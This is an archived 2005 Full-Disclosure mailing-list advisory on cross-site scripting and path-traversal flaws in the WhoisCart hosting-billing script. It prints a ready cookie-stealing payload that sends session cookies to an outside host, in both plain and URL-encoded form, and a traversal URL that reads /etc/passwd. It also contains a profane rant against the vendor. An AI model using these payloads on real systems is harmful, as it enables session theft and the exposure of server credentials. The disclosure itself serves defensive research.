[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Multiple Vulnerabilities in Saeven.net's WhoisCart software.

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Multiple Vulnerabilities in Saeven.net's WhoisCart software.
From: "Elzar Stuffenbach" <sanisoft@xxxxxxxxxxxxx>
Date: Thu, 23 Jun 2005 10:38:46 +0800

Subject:
Saeven.net's WhoisCart (all versions released prior to this disclosure) is 
vulnerable in
that it allows an attacker to insert Javascript into user viewed pages, and 
also to view
any world readable file on the server hosting the WhoisCart software.


Severity:
Severe; These vulnerabilities can allow an attacker to access literally access 
any part
of a system, as plaintext database passwords can be read from the WhoisCart
configuration, or users' session ID cookies stolen, and used to access user 
accounts.


Preamble:
(Taken from http://www.whoiscart.net/)
Able to remember, and apt at making your life easier - Whois.Cart 2.2 is a 
hosting and
domains shopping cart and billing management system that will most likely be 
your best
friend during your domain hosting and registration business venture. Easily 
skinned
using our versatile theme architecture, with support for over a dozen payment 
portals,
fourteen different languages, and capable of all billing recurrences; the 
system is
quickly becoming the most popular and highest rated script in its class [1]. 
Coded
entirely in PHP, we challenge you to find a system faster than ours. 
Long-ranked in
Zend's Top 10, and by far the most feature packed software for its price - come 
and see
why exactly 3155 users just can't be wrong.


Problem:
The first vulnerability, involving Javascript injection, and ultimately session 
ID
extraction, is exploited by utilizing an unsecured user input field.

http://yourdomain.com/whoiscart/profile.php?page=INSERT_JAVASCRIPT_HERE

Basically, url encode some Javascript, like so:

<body onload=document.forms[0].submit(document.cookie)><form name=form1
action=http://yourmaliciousdomain.com/somescript></form></body>

turns into:

%3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2F12.202.41.221%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E

Then that url encoded Javascript is inserted at the appropriate location above.


Next Problem:
The next vulnerability involves the plain-text printing of any world readable 
file on
the system (including any and all configuration files used to run WhoisCart, 
store
session IDs, store plaintext database passwords, etc.).

http://yourdomain.com/whoiscart/?language=../../../../../../../../../../../../../etc/passwd%00

There you have the ability to read any world readable file on the server. The 
%00 is to
append a null character, as to avoid getting something like /etc/passwd.php.


Workaround:
Use different software, not written by a 12 year old (no offense to any kids 
reading
this, but think about security, for once). The vulnerabilities shown here are 
indicative
of a truly inferior software product. The product is not even feature complete. 
The beta
that's been in progress for 2 years, can be seen at 
http://beta.whoiscart.net/admin/,
barely started. Vulnerabilities like this still exist, and have existed 
throughout the
software since its inception. The only fix for this is for Saeven.net to 
release a new
product, rewritten from the ground up, or for the consumer to choose a new 
product
altogether (yes, there are better ones on the market for the same price, try 
Google). If
a software allows the unauthorized viewing of globally readable files, the 
software has
already failed, and deserves to be shot down such as this.


Vendor Contact:
    saeven.net consulting
    Alexandre Lemaire        (registrations@xxxxxxxxxx)
    1968 Portobello blvd
    Orleans
    Ontario,K4A 4E0
    CA
    Tel. +91.226370256    (If you call, careful you don't get his mom)


Disclosure Timeline:
Vendor Notified: June 21, 2005
Public Release: June 22, 2005


About the Author:
The author is a software engineer, with an absolute detest for bullshit. 
Sometimes I
detest some languages, because they allow punks like this to write shit 
software, and
then the dumbass programmer puts up a website, uses the word "innovative", and 
ends up
ultimately screwing over a few hundred people, who maintain the personal 
information of
thousands of people. Identity theft starts with "companies" such as this. 
Choose a
trusted solution. The ability to crunch a few numbers, or execute a few lines 
of PHP,
does NOT make something trustworthy. A company with a non-ficticious in-house 
lawyer is
a good start, and then a company who knows what the fuck they're doing when it 
comes to
software design and implementation is stellar.

It is this type of bullshit I detest, and I advise everyone against using this 
product,
for numerous reasons, all founding from the same core element: a product is not 
to be
trusted because of a flashy website, or because some kid lies about his age.


Conclusion:
Here is an email, verbatim from Mr. Lemaire:
<quote>
From: "S. Alexandre M. Lemaire" <saeven@xxxxxxxxxx>
I'll indulge your comments.

    The truth is that I don't maintain the work on whois.cart currently. I
have a staff of 13 people working for me right now, the developments are
intense and I don't have the time to monitor them as I usually would.  They
package and operate independently from myself.  My user community knows well
(as I post frequent updates in the forums) that I'm currently vested into
our other project, our helpdesk.  We have a user base of 3000+, you aren't
the only one to submit bug reports - note also that the people that work for
me, aren't bored teenagers.  They are people with M.Scs and PhDs in computer
science and related fields, who've agreed to partake in the whois.cart
project on their spare time initially.  Your concern for security, is not
exclusive.
</quote>

Show me a person with a Masters or PHd in Computer Science that both works in 
the
webhosting software industry and writes shit software like this, and I will 
show you
shit that smells like roses.

-- 
_______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.

Powered by Outblaze
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] OSX Safari "PAC" url DoS
Next by Date: Re: [Full-disclosure] Intense School finally goes under, bought up by k-mart of security companies
Previous by thread: [Full-disclosure] iDEFENSE Security Advisory 06.22.05: IpSwitch WhatsUp Professional 2005 (SP1) SQL Injection Vulnerability
Next by thread: [Full-disclosure] Windows IPSec Vulnerabilty - still exist
Index(es):
- Date
- Thread